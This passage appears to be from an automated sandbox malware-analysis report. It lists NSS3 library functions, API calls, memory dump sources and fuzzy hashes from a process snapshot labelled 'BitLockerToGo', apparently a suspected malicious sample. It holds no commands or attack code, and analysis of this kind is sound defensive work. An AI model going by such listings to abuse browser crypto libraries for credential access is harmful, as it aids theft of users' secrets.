                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C65FD46
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C65FD51
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C65FD6D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C65FD84
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 76e8a6a4782bf9f5fe934e12607101bde91ec5e80bf501168ddedeca61538f52
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831B3B69002199BEB008AA49D057AF77A8EF45318F650635DC14A7B00EB76E928C7DB
                                                                                                                                                                                                                                                                                                                                                          Function 6C640F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C640F62
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C640F84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6C65F59B,6C76890C,?), ref: 6C640FA8
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C640FC1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C640FDB
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C640FEF
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C641001
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C641009
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 338c16c76c49020bed8e7b5f99ea3d75768e9f9d098d8fa17e08294c73ac6bea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8ffc1e16ef1e94c208669ac8d139971e45ab3cdd14be109832b57fc5cb4bc53f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338c16c76c49020bed8e7b5f99ea3d75768e9f9d098d8fa17e08294c73ac6bea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3921F5B1904204ABE7109F69DD40EAE7BB4EF46758F00C529FC1897601FB31EA56CBD6
                                                                                                                                                                                                                                                                                                                                                          Function 6C646DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C647D8F,6C647D8F,?,?), ref: 6C646DC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C69FE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C69FE1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C69FE62
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C647D8F,?,?), ref: 6C646DD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FA0,00000000,?,?,?,?,6C647D8F,?,?), ref: 6C646DF7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C646E35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C69FE29
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C69FE3D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C69FE6F
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C646E4C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FE0,00000000), ref: 6C646E82
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C646AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C64B21D,00000000,00000000,6C64B219,?,6C646BFB,00000000,?,00000000,00000000,?,?,?,6C64B21D), ref: 6C646B01
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C646AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C646B8A
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C646F1E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C646F35
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FE0,00000000), ref: 6C646F6B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C647D8F,?,?), ref: 6C646FE1
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a15a3c7446fe9de75e8ba931163b3a1201241ce6d7f3940bc8bab5877a33fad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ff46ea2bf292870caf7504f84bae10b96f75bc97c21171849c2e3152ed0eb68
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a15a3c7446fe9de75e8ba931163b3a1201241ce6d7f3940bc8bab5877a33fad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41719271D106469FDB00CF55CD40BEABBA5BF95308F15822AE848DBB11F770EA94CB98
                                                                                                                                                                                                                                                                                                                                                          Function 6C680FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C681057
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C681085
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetAllTokens.NSS3 ref: 6C6810B1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C681107
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C681172
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C681182
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6811A6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C6811C5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C65EAC5,00000001), ref: 6C6852DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: EnterCriticalSection.KERNEL32(?), ref: 6C6852F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: PR_Unlock.NSS3(?), ref: 6C685358
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6811D3
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6811F3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1549229083-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d16f3a98a445da86a2301f3603ae12ee7174b1a0efabda8fa488ecc18295cc63
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e043624ddd2b3798d9a79bf987b623eea7e29bacb7d780d237c0ea534cd940a8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d16f3a98a445da86a2301f3603ae12ee7174b1a0efabda8fa488ecc18295cc63
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9061B5B0E063459BEB00DF64DC45BAEB7B5BF05348F144128EC29AB741EB31E945CB69
                                                                                                                                                                                                                                                                                                                                                          Function 6C68ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEF1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(6C66CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66CDBB,?), ref: 6C68AF0B
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AF30
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e776e83cab8c46657a30bb8917961e789c1cbd7377b1b742d862370b3952bb9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fc3010ea6aeadc1d842322eca6b558db566c0d9b4a77bfefccb1f321f20db57e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e776e83cab8c46657a30bb8917961e789c1cbd7377b1b742d862370b3952bb9e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E51BFB1A02601AFDB00DF25D888B5AB7B4FF09319F144664EC0897B92E731E865CBF5
                                                                                                                                                                                                                                                                                                                                                          Function 6C664CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C66AB7F,?,00000000,?), ref: 6C664CB4
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C66AB7F,?,00000000,?), ref: 6C664CC8
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66AB7F,?,00000000,?), ref: 6C664CE0
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C66AB7F,?,00000000,?), ref: 6C664CF4
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C66AB7F,?,00000000,?), ref: 6C664D03
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C664D10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C664D26
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C664D98
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C664DDA
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C664E02
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a1e7fde95fcea270b80167793a448684c4132d6b73f3228a27b2824887b9eec2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c92863b8fcee000e1843f91ef3452d166cfe96143dc5549c56b82d6bfb17af1c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1e7fde95fcea270b80167793a448684c4132d6b73f3228a27b2824887b9eec2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC41B5B5E00205ABEB019F25EC549AA77F8AF4635DF144170EC0887F12EB71D929C79A
                                                                                                                                                                                                                                                                                                                                                          Function 6C6689C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C66AE9B,00000000,?,?), ref: 6C6689DE
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C6689EF
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B), ref: 6C668A02
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C668A11
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Digest$Context$BeginCreateDestroy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 407214398-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eaffa9352db80448f2904c5ca47f93625a50d63481f915dbcd5c362b1cd59c5c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9984bc051e6e8762c26c3850b21cef1123ae1fec79e489632b2d4af2be6300e8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaffa9352db80448f2904c5ca47f93625a50d63481f915dbcd5c362b1cd59c5c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B511C3B2A0020166FA005A76AC81BAB75589B4779DF080036ED0999F52F722D819C2FF
                                                                                                                                                                                                                                                                                                                                                          Function 6C642E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
